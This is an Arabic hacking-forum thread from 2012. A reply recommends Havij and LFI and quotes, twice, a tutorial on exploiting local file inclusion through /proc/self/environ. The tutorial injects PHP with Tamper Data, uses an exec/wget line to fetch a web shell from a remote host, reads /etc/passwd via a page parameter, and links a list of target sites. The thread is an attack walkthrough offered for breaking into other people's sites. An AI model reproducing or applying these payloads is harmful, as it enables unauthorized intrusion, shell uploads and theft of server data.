التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-27-2012, 11:56 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي مجاب: رد: ارجوا العناكب الدخول


جرب اكتب المعلومات يدوي مش كوبي وباست
اتاكد ان الجدول بتاع معلومات المدير صحيح
استعمل برنامج الهافج
الموقع به ثغره LfI افضل من Sql

class="smallfont">اقتباس
المشاركة الأصلية كتبت بواسطة Dr.abolalh
السلام عليكم ورحمة الله وبركاتة

كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

المتطلبات
1. FireFox [download]
2. Tamper Data [download]
والموقع المراد التطبيق علية

انا جبت لكم كم موقع

http://pastie.org/private/7fbtucb1obczki7nk0xvxa


طيب نكمل

في البداية لازم نقدر نقرى proc/self/environ

اضغط هنا لترى الصورة بحجمها الطبيعى

بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا

بعد ماتشتغل معنا الاداة
نروح لم



بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة



بعدها نروح للمربع هاذا





في هاذا المربع وضعنا
<?php phpinfo();?>


عشان نقرة phpinfo ونضمن الشغل

بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل



بعدها ماتضغط وتتخطى

يفتح الموقع ويتم قراة phpinfo



ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل



<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system

ومع شوي تطوير راح تضبط

بعدها

نروح نشوف

راح يفتح الموقع مثل ماكان

طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd

ونحط
http://www.site.com/shell.php


وباذن الله راح يتم الرفع الشل

اتمنا الشرح ماهو مكرر

اخوكم Dr.abolalh




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC v]: hv[,h hgukh;f hg]o,g

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

أفضل جواب - كتبه MaFia
جرب اكتب المعلومات يدوي مش كوبي وباست
اتاكد ان الجدول بتاع معلومات المدير صحيح
استعمل برنامج الهافج
الموقع به ثغره LfI افضل من Sql

اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dr.abolalh
السلام عليكم ورحمة الله وبركاتة

كيفكم اخواني اتمنا الجميع بخير وصحة وعافية

حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم

المتطلبات
1. FireFox [download]
2. Tamper Data [download]
والموقع المراد التطبيق علية

انا جبت لكم كم موقع

http://pastie.org/private/7fbtucb1obczki7nk0xvxa


طيب نكمل

في البداية لازم نقدر نقرى proc/self/environ

اضغط هنا لترى الصورة بحجمها الطبيعى

بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا

بعد ماتشتغل معنا الاداة
نروح لم



بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة



بعدها نروح للمربع هاذا





في هاذا المربع وضعنا
<?php phpinfo();?>


عشان نقرة phpinfo ونضمن الشغل

بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل



بعدها ماتضغط وتتخطى

يفتح الموقع ويتم قراة phpinfo



ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل



<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه
الى chmod
system

ومع شوي تطوير راح تضبط

بعدها

نروح نشوف

راح يفتح الموقع مثل ماكان

طيب لما تنتهي من الحقن مثال هل الموقع
http://www.site.com/index.php?page=/etc/passwd
نمسح
index.php?page=/etc/passwd

ونحط
http://www.site.com/shell.php


وباذن الله راح يتم الرفع الشل

اتمنا الشرح ماهو مكرر

اخوكم Dr.abolalh

موضوع مغلق

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:42 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0